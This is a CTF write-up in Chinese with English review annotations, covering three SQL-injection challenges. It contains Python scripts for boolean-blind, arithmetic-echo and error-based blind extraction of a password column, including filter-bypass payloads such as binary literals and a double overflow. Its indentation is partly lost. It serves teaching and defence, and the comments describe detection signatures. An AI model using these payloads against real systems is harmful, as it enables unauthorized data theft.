三道sql注入题,涨姿势.
部分代码审计,实际上就是要对 `hi` 参数进行布尔盲注,如果分数更新了,就说明注入条件为真.
#hi = where ord(mid((select group_concat(user())), 1, 1)) > 0 &flag=55553
import requests
# Script 1: boolean-based blind extraction.  The oracle is whether the reply
# echoes the `flag` value that was just submitted, so any reflected,
# attacker-chosen field is enough to leak one bit per request.  From the
# defender's side the two handles are visible right here: `hi` reaches the
# query as raw SQL text, and the response reflects `flag` back; the request
# pattern (bursts of POSTs with `mid((select group_concat(` in `hi` and a
# monotonically increasing `flag`) is an easy detection signature.
# NOTE(review): the write-up lost its indentation; the nesting below is
# inferred from the statement order, not from the source layout.
url = 'http://47.97.168.223:23333/'
ans = ''
# `flag` is incremented once per request so each reply is distinguishable;
# seeing the current value in the reply is the "condition true" signal.
flag = 153333
mid = 0  # written but never read
# Only positions 10..14 are scanned here; earlier positions are presumably
# from a previous run (see the recovered values in the comments below).
for pos in range(10,15):
l = 0  # unused: no binary search is performed, the scan over `x` is linear
r = 127  # unused
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"}  # built but never passed to requests.post()
mid = 0
# Candidate alphabet, tried in order; the first character that matches wins.
x='1234567890qwertyuiopasdfghjkl;zxcvbnm,._/QWERTYUIOPASDFGHJKLZXCVBNM'
for j in range(0,len(x)):
flag = flag + 1
# `hi` becomes a WHERE clause comparing character `pos` of the concatenated
# password column with the hex of one candidate character.
data = {'hi': ' where mid((select group_concat(password)) ,' +str(pos) +', 1) like '+hex(ord(x[j])), 'flag': flag}
resp = requests.post(url,data=data).text
if str(flag) in resp:
ans = ans + x[j]
break
# NOTE(review): rebinding the loop variable does not restart `for j`, so this
# branch is effectively a no-op; it looks like an unfinished retry on a reply
# that reflected neither the current nor the previous `flag`.
elif str(flag-1) not in resp:
j = 0
print pos
print ans
#venenof7
#he3l3locat233
`mid` 被过滤了,还有几个数字也被过滤了,可以用 `conv` 搭配 `hex` 将每一位转换成16进制,再 `*flag`,回显即是每一位转成数字后的结果,逆推一下就知道了.
import re
import requests
# Base URL of the challenge instance; every request below POSTs here.
_target = 'http://47.52.137.90:20000/'
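def extract_points(html):
    """Return the "My Points" counter from an HTML reply as a digit string.

    The reply's points value is the side channel every request in this
    script reads back, so a parse failure should be loud rather than an
    AttributeError on ``None``.

    The pattern requires the digits to be followed by a line break, which is
    what the original regex matched; the literal had been wrapped across two
    lines in the write-up and is restored to one line so the module parses.

    Args:
        html: response body text.

    Returns:
        The captured digits, stripped.

    Raises:
        ValueError: if the "My Points" marker is not present in ``html``.
    """
    match = re.search(r'My Points \| ([0-9]+)\n', html)
    if match is None:
        raise ValueError('"My Points" marker not found in response')
    return match.group(1).strip()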
def get_pw_len():
    """Ask the target for the length of ``pw`` and return it as an int.

    ``flag`` is sent as ``'1'`` and ``hi`` as ``'*length( pw )'``; per the
    write-up the server multiplies them and displays the result as the
    points value, which is read back through extract_points().
    """
    payload = {'flag': '1', 'hi': '*length( pw )'}
    reply = requests.post(_target, data=payload)
    points = extract_points(reply.text)
    return int(points)
# Script 2: one request per character position.  Digits inside the payload
# are written as binary literals (0b...) because, per the write-up, decimal
# digits were filtered.  The points value in each reply is the hex of one
# password character, interpreted as an integer; the client turns it back
# into a character.  Indentation was lost in the write-up; nesting is inferred.
flag = ''
for i in range(1,get_pw_len()+1):
d = {'flag': '1', 'hi': '*convert(hex(substr( pw ,0b{0:b},1)),signed)'.format(i)}
resp = requests.post(_target, data=d)
# e.g. a reply of 41 means hex "41" -> 'A'.
flag += chr(int(extract_points(resp.text), 16))
print flag
print '[+] flag: N1CTF{{{}}}'.format(flag)
fuzz后发现能过滤的都过滤了,数字只剩下2和9,还有 `select`、`if` 可用,更不同的是,这次的分数看不到了,只能根据报错 `sorry` 进行盲注.有个坑人的地方在于那边的 `sorry` 非常小,比赛时根本没看见,还以为报不了错 :P
1.整型溢出报错
*
+
2.类型转换导致unsigned出现负号致使报错
^
3.浮点数报错
double的范围:-1.79E+308 ~ +1.79E+308
^(取反)
import string
import requests
import sys
# Script 3: error-based blind oracle.  The points value is no longer shown,
# so the signal is whether the page replies with 'sorry'.  Per the write-up,
# 999999999*9e299 exceeds the double range and raises an error, so a false
# comparison produces the error page.  Detection-wise this leaves a burst of
# POSTs whose `hi` field carries `if((select pw)>` and whose replies flip
# between the normal page and the error page.
# NOTE(review): the write-up lost its indentation; nesting below is inferred.
flag = 0
url = "http://9ec20782e7c14e2bac67c9bde95b39e39c887ccc4d314867.game.ichunqiu.com/"
data = {'flag': flag}
# Explicitly disables any proxy picked up from the environment.
proxies={
'http':None,
'https':None
}
index = 1  # unused
ans = ""
while True:
# ascii_letters is scanned a-z then A-Z; each request compares the whole
# password against the recovered prefix plus one candidate letter.
for i in string.ascii_letters:
data['hi'] = "|if((select pw)>'%s',2,999999999*9e299)" % (ans + i)
result = requests.post(url, data=data,proxies=proxies)
# Whole alphabet exhausted without a hit: stop the script.
if i=='Z':
exit()
# First letter that triggers the error means the previous letter was the
# right one.  NOTE(review): chr(ord(i)-1) gives '@' when i == 'A', not 'z';
# the write-up's "restore g to h" remark covers a separate last-character
# off-by-one.
if 'sorry' in result.text:
ans += chr(ord(i)-1)
print ans
sys.stdout.flush()
break
注意最后一位把g还原成h即可
http://hackermio.me/2018/04/21/BCTF-Web-Writeup/
http://f1sh.site/2018/04/22/bctf-love-q-writeup/